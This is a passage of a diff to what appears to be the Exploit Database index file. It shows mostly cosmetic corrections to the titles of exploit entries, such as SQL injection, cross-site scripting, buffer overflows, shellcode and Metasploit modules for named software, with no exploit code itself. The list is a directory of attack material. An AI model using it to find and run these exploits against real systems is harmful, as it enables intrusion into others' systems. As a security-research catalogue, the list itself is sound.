MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0 23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,windows,remote,0 -23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 - Path Traversal",2012-12-12,"Sebastian Perez",windows,webapps,0 -23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 +23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 - Directory Traversal",2012-12-12,"Sebastian Perez",windows,webapps,0 +23325,platforms/multiple/dos/23325.c,"BRS Webweaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal",2003-11-01,"Zero X",asp,webapps,0 23327,platforms/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access",2003-11-01,t4rku5,windows,local,0 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0 23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting",2003-11-03,"Michael Frame",php,webapps,0 23331,platforms/asp/webapps/23331.txt,"Web Wiz Forum 6.34/7.0/7.5 - Unauthorized Private Forum Access",2003-11-03,"Alexander Antipov",asp,webapps,0 -23332,platforms/cgi/webapps/23332.txt,"MPM GuestBook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps,0 +23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps,0 23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 - Include.php Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 @@ -20565,7 +20566,7 @@ id,file,description,date,author,platform,type,port 23337,platforms/windows/dos/23337.c,"Avaya Argent Office - Malformed DNS Packet Denial of Service",2001-08-07,"Jacek Lipkowski",windows,dos,0 23338,platforms/php/webapps/23338.txt,"John Beatty Easy PHP Photo Album 1.0 - dir Parameter HTML Injection",2003-11-04,nimber@designer.ru,php,webapps,0 23339,platforms/openbsd/dos/23339.c,"OpenBSD 2.x/3.x - Local Malformed Binary Execution Denial of Service",2003-11-04,"Georgi Guninski",openbsd,dos,0 -23340,platforms/windows/remote/23340.txt,"Microsoft Internet Explorer 6.0 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote,0 +23340,platforms/windows/remote/23340.txt,"Microsoft Internet Explorer 6 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote,0 23341,platforms/hp-ux/local/23341.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (1)",2003-04-01,watercloud,hp-ux,local,0 23342,platforms/hp-ux/local/23342.c,"HP-UX 10/11 - NLSPATH Environment Variable Format String (2)",2003-04-01,watercloud,hp-ux,local,0 23343,platforms/hp-ux/local/23343.c,"HP-UX 11 - Software Distributor Lang Environment Variable Local Buffer Overrun",2002-12-11,watercloud,hp-ux,local,0 @@ -20580,9 +20581,9 @@ id,file,description,date,author,platform,type,port 23352,platforms/linux/local/23352.c,"TerminatorX 3.8 - Multiple Command-Line and Environment Buffer Overrun Vulnerabilities (3)",2003-11-07,"m00 security",linux,local,0 23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,php,webapps,0 23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent Cross-Site Scripting",2012-12-13,"Mr. P-teo",php,webapps,0 -23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant Cross-Site Scripting",2012-12-13,limb0,php,webapps,0 -23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 -23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis GuestBook 1.0 - $path Remote File Inclusion",2003-11-17,"RusH security team",php,webapps,0 +23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistent Cross-Site Scripting",2012-12-13,limb0,php,webapps,0 +23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin WordPress Plugin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 +23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",php,webapps,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps,0 @@ -20591,7 +20592,7 @@ id,file,description,date,author,platform,type,port 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection",2012-12-13,modpr0be,php,webapps,0 23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x - profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0 23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0 -23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,windows,remote,0 +23365,platforms/windows/remote/23365.txt,"telcondex SimpleWebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,windows,remote,0 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x - CTCP Nickname Server Message Buffer Overrun",2003-11-10,Li0n7,linux,remote,0 23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - Denial of Servicee.pl Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps,0 23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (1)",2003-11-10,demz,linux,remote,0 @@ -20602,14 +20603,14 @@ id,file,description,date,author,platform,type,port 23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x - URI Handler Directory Traversal",2003-11-12,S.G.Masood,windows,remote,0 23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 - Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",windows,dos,0 23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service",2003-11-12,"Jonny Robertson",linux,dos,0 -23376,platforms/hardware/remote/23376.txt,"FortiGate Firewall 2.x - dlg Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 -23377,platforms/hardware/remote/23377.txt,"FortiGate Firewall 2.x - Policy Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 -23378,platforms/hardware/remote/23378.txt,"FortiGate Firewall 2.x - listdel Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 -23379,platforms/hardware/remote/23379.txt,"FortiGate Firewall 2.x - selector Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 +23376,platforms/hardware/remote/23376.txt,"Fortigate Firewall 2.x - dlg Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 +23377,platforms/hardware/remote/23377.txt,"Fortigate Firewall 2.x - Policy Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 +23378,platforms/hardware/remote/23378.txt,"Fortigate Firewall 2.x - listdel Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 +23379,platforms/hardware/remote/23379.txt,"Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",multiple,remote,0 23381,platforms/php/webapps/23381.txt,"PHPWebFileManager 2.0 - 'index.php' Directory Traversal",2003-11-17,"RusH security team",php,webapps,0 23390,platforms/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow",2003-11-20,D_BuG,multiple,dos,0 -23391,platforms/linux/dos/23391.txt,"FreeRADIUS 0.x/1.1.x - Tag Field Heap Corruption",2003-11-20,"Evgeny Legerov",linux,dos,0 +23391,platforms/linux/dos/23391.txt,"FreeRadius 0.x/1.1.x - Tag Field Heap Corruption",2003-11-20,"Evgeny Legerov",linux,dos,0 23392,platforms/openbsd/dos/23392.c,"OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing",2003-11-21,anonymous,openbsd,dos,0 23393,platforms/linux/dos/23393.c,"GEdit 2.0/2.2 - Large IOStream File Memory Corruption",2003-11-23,MegaHz,linux,dos,0 23394,platforms/hardware/dos/23394.c,"Thomson Cablemodem TCM315 - Denial of Service",2003-11-24,"Shell security group",hardware,dos,0 @@ -20621,17 +20622,17 @@ id,file,description,date,author,platform,type,port 23400,platforms/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote,0 23401,platforms/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",windows,remote,0 23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 - Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 -23403,platforms/php/webapps/23403.pl,"My_EGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",php,webapps,0 +23403,platforms/php/webapps/23403.pl,"My_eGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",php,webapps,0 23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 - Debug Query Information Disclosure",2003-12-01,scrap,php,webapps,0 23407,platforms/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopsearch.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 23408,platforms/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopdisplayproducts.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 -23409,platforms/cgi/webapps/23409.c,"Jason Maloney's GuestBook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,cgi,webapps,0 +23409,platforms/cgi/webapps/23409.c,"Jason Maloney's Guestbook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,cgi,webapps,0 23410,platforms/cgi/webapps/23410.txt,"IBM Directory Server 4.1 - Web Administration Interface Cross-Site Scripting",2003-12-02,"Oliver Karow",cgi,webapps,0 23411,platforms/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",windows,remote,0 23412,platforms/windows/dos/23412.pl,"EZPhotoShare 1.0/1.1 - Memory Corruption",2003-12-03,Winter-Smith,windows,dos,0 23413,platforms/linux/remote/23413.c,"PLD Software Ebola 0.1.4 - Buffer Overflow",2003-12-05,c0wboy,linux,remote,0 -23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-directory Command Execution",2003-12-05,auto22238,linux,local,0 +23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0 23415,platforms/asp/webapps/23415.txt,"Virtual Programming VP-ASP 4/5 - shopdisplayproducts.asp Cross-Site Scripting",2003-12-05,"Xnuxer Research",asp,webapps,0 23416,platforms/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x - Multiple Vulnerabilities",2003-12-06,frog,php,webapps,0 23417,platforms/windows/remote/23417.c,"EZMeeting 3.x - EZNet.exe Long HTTP Request Remote Buffer Overflow",2003-12-08,kralor,windows,remote,0 @@ -20642,9 +20643,9 @@ id,file,description,date,author,platform,type,port 23422,platforms/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 23423,platforms/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6 / Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,php,webapps,0 -23449,platforms/unix/remote/23449.txt,"Xerox MicroServer - Web Server Remote Directory Traversal",2003-12-19,"J.A. Gutierrez",unix,remote,0 -23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - Webserver Directory Traversal",2003-12-19,"Luigi Auriemma",windows,remote,0 -23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - Webserver Cross-Site Scripting",2003-12-19,"Luigi Auriemma",windows,remote,0 +23449,platforms/unix/remote/23449.txt,"Xerox MicroServer - Web Server Directory Traversal",2003-12-19,"J.A. Gutierrez",unix,remote,0 +23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 - WebServer Directory Traversal",2003-12-19,"Luigi Auriemma",windows,remote,0 +23451,platforms/windows/remote/23451.txt,"PY Software Active Webcam 4.3 - WebServer Cross-Site Scripting",2003-12-19,"Luigi Auriemma",windows,remote,0 23452,platforms/linux/dos/23452.txt,"Tcpdump 3.x - L2TP Parser Remote Denial of Service",2003-12-20,"Przemyslaw Frasunek",linux,dos,0 23427,platforms/linux/dos/23427.txt,"Totem Movie Player 3.4.3 (Ubuntu) - Stack Corruption",2012-12-16,coolkaveh,linux,dos,0 23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 @@ -20661,11 +20662,11 @@ id,file,description,date,author,platform,type,port 23439,platforms/multiple/remote/23439.txt,"MVDSV 0.165 b/0.171 Quake Server - Download Buffer Overrun",2003-12-15,"Oscar Linderholm",multiple,remote,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 23441,platforms/linux/remote/23441.c,"Cyrus IMSP Daemon 1.x - Remote Buffer Overflow",2003-12-15,"Carlos Barros",linux,remote,0 -23442,platforms/osx/dos/23442.txt,"MacOSX 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,osx,dos,0 +23442,platforms/osx/dos/23442.txt,"Apple Mac OS X 10 - CD9660.Util Probe For Mounting Argument Local Buffer Overflow",2003-12-15,Max,osx,dos,0 23443,platforms/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities",2003-12-16,JeiAr,php,webapps,0 23444,platforms/multiple/dos/23444.pl,"SX Design sipd 0.1.2/0.1.4 - Remote Format String",2003-12-16,storm,multiple,dos,0 23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 - osCsid Parameter Cross-Site Scripting",2003-12-17,JeiAr,php,webapps,0 -23446,platforms/windows/remote/23446.txt,"GoAhead Webserver 2.1.x - ASP Script File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote,0 +23446,platforms/windows/remote/23446.txt,"GoAhead WebServer 2.1.x - ASP Script File Source Code Disclosure",2002-12-17,"Luigi Auriemma",windows,remote,0 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps,0 23448,platforms/php/webapps/23448.php,"phpwcms 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - index.inc.php File Include",2003-12-20,frog,php,webapps,0 @@ -20679,7 +20680,7 @@ id,file,description,date,author,platform,type,port 23461,platforms/windows/remote/23461.txt,"dcam webcam server personal Web server 8.2.5 - Directory Traversal",2003-12-22,"Luigi Auriemma",windows,remote,0 23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 - products_id URI Parameter SQL Injection",2003-12-22,JeiAr,php,webapps,0 23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 - manufacturers_id Parameter Cross-Site Scripting",2003-12-22,JeiAr,php,webapps,0 -23464,platforms/windows/remote/23464.pl,"Opera 7.x - Relative Path Directory Traversal File Corruption",2003-11-15,nesumin,windows,remote,0 +23464,platforms/windows/remote/23464.pl,"Opera 7.x - Directory Traversal",2003-11-15,nesumin,windows,remote,0 23465,platforms/windows/remote/23465.txt,"Opera Browser 6.0 6 - URI Display Obfuscation",2003-12-23,nesumin,windows,remote,0 23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - store Parameter Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - template Parameter Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 @@ -20722,7 +20723,7 @@ id,file,description,date,author,platform,type,port 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient - Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 23503,platforms/windows/remote/23503.txt,"NETObserve 2.0 - Authentication Bypass",2003-12-29,"Peter Winter-Smith",windows,remote,0 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 - showHelp CHM File Execution",2003-12-30,"Arman Nayyeri",windows,dos,0 -23505,platforms/osx/dos/23505.c,"Apple Mac OSX 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 +23505,platforms/osx/dos/23505.c,"Apple Mac OS X 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0 23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - config_page.php Remote PHP File Include",2004-01-02,tsbeginnervn,php,webapps,0 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 - Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0 @@ -20732,7 +20733,7 @@ id,file,description,date,author,platform,type,port 23512,platforms/windows/dos/23512.txt,"Surfnet 1.31 - CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,windows,dos,0 23513,platforms/php/webapps/23513.txt,"Athena Web Registration - Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps,0 23514,platforms/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server - Buffer Overflow",2004-01-04,"Peter Winter-Smith",windows,remote,0 -23515,platforms/asp/webapps/23515.txt,"ASPApp PortalAPP - Remote User Database Access",2004-01-04,newbie6290,asp,webapps,0 +23515,platforms/asp/webapps/23515.txt,"ASPApp PortalApp - Remote User Database Access",2004-01-04,newbie6290,asp,webapps,0 23516,platforms/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",asp,webapps,0 23517,platforms/php/webapps/23517.txt,"HotNews 0.x - hotnews-engine.inc.php3 config[header] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23518,platforms/php/webapps/23518.txt,"HotNews 0.x - config[incdir] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 @@ -20753,7 +20754,7 @@ id,file,description,date,author,platform,type,port 23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal",2004-01-09,badpack3t,windows,remote,0 23533,platforms/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure",2004-01-09,"Mark Bassett",windows,remote,0 23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service",2004-01-09,badpack3t,windows,dos,0 -23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - edit.cgi Remote Directory Traversal",2004-01-10,FIST,cgi,webapps,0 +23535,platforms/cgi/webapps/23535.txt,"DansGuardian Webmin Module 0.x - edit.cgi Directory Traversal",2004-01-10,FIST,cgi,webapps,0 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - module.php Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service",2004-01-12,dr_insane,windows,dos,0 @@ -20775,7 +20776,7 @@ id,file,description,date,author,platform,type,port 23554,platforms/php/webapps/23554.java,"YABB SE 1.x - SSI.php ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps,0 23555,platforms/windows/remote/23555.txt,"GoAhead WebServer 2.1.x - Directory Management Policy Bypass",2004-01-19,"Luigi Auriemma",windows,remote,0 23556,platforms/multiple/dos/23556.txt,"GetWare Web Server Component - Content-Length Value Remote Denial of Service",2004-01-19,"Luigi Auriemma",multiple,dos,0 -23557,platforms/multiple/remote/23557.txt,"aiptek netcam webserver 0.93.15 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 +23557,platforms/multiple/remote/23557.txt,"aiptek netcam WebServer 0.93.15 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",multiple,remote,0 23558,platforms/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",php,webapps,0 23559,platforms/windows/remote/23559.txt,"WebTrends Reporting Center 6.1 Management Interface - Full Path Disclosure",2004-01-20,"Oliver Karow",windows,remote,0 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 @@ -20793,7 +20794,7 @@ id,file,description,date,author,platform,type,port 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - NULL Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injections",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 - Printer Firmware Update Script Arbitrary File Upload",2004-03-24,wirepair,windows,remote,0 -23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Remote Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote,0 +23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote,0 23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT - Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT - Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0 @@ -20816,7 +20817,7 @@ id,file,description,date,author,platform,type,port 23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 - db2www Error Message Cross-Site Scripting",2004-01-26,"Carsten Eiram",multiple,remote,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",php,webapps,0 23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",multiple,remote,0 -23694,platforms/windows/remote/23694.rb,"RealPlayer - .RealMedia File Handling Buffer Overflow",2012-12-27,Metasploit,windows,remote,0 +23694,platforms/windows/remote/23694.rb,"RealPlayer - '.RealMedia' File Handling Buffer Overflow",2012-12-27,Metasploit,windows,remote,0 23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP - Remote Command Execution",2012-12-23,Metasploit,multiple,remote,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0 @@ -20828,7 +20829,7 @@ id,file,description,date,author,platform,type,port 23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0 -23612,platforms/windows/remote/23612.txt,"BRS WebWeaver 1.0.7 - ISAPISkeleton.dll Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 +23612,platforms/windows/remote/23612.txt,"BRS Webweaver 1.0.7 - ISAPISkeleton.dll Cross-Site Scripting",2004-01-28,"Oliver Karow",windows,remote,0 23613,platforms/cgi/webapps/23613.txt,"Leif M. Wright Web Blog 1.1 - File Disclosure",2004-01-20,"Zone-h Security Team",cgi,webapps,0 23614,platforms/windows/dos/23614.txt,"Loom Software SurfNow 1.x/2.x - Remote HTTP GET Request Denial of Service",2004-01-28,"Donato Ferrante",windows,dos,0 23615,platforms/cgi/webapps/23615.txt,"PJ CGI Neo Review - Directory Traversal",2004-01-29,"Zone-h Security Team",cgi,webapps,0 @@ -20841,7 +20842,7 @@ id,file,description,date,author,platform,type,port 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 -23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php id parameter' SQL Injection",2012-12-24,Red_Hat,php,webapps,0 +23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php id Parameter' SQL Injection",2012-12-24,Red_Hat,php,webapps,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",php,webapps,0 23688,platforms/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 @@ -20850,12 +20851,12 @@ id,file,description,date,author,platform,type,port 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0 23633,platforms/windows/dos/23633.txt,"Crob FTP Server 3.5.1 - Denial of Service",2004-02-02,"Zero X",windows,dos,0 23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0 -23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Remote Directory Traversal",2004-02-02,dr_insane,asp,webapps,0 +23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Directory Traversal",2004-02-02,dr_insane,asp,webapps,0 23636,platforms/php/webapps/23636.txt,"Qualiteam X-Cart 3.x - general.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0 23638,platforms/hardware/dos/23638.pl,"Cisco IOS 12 MSFC2 - Malformed Layer 2 Frame Denial of Service",2004-02-03,blackangels,hardware,dos,0 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure 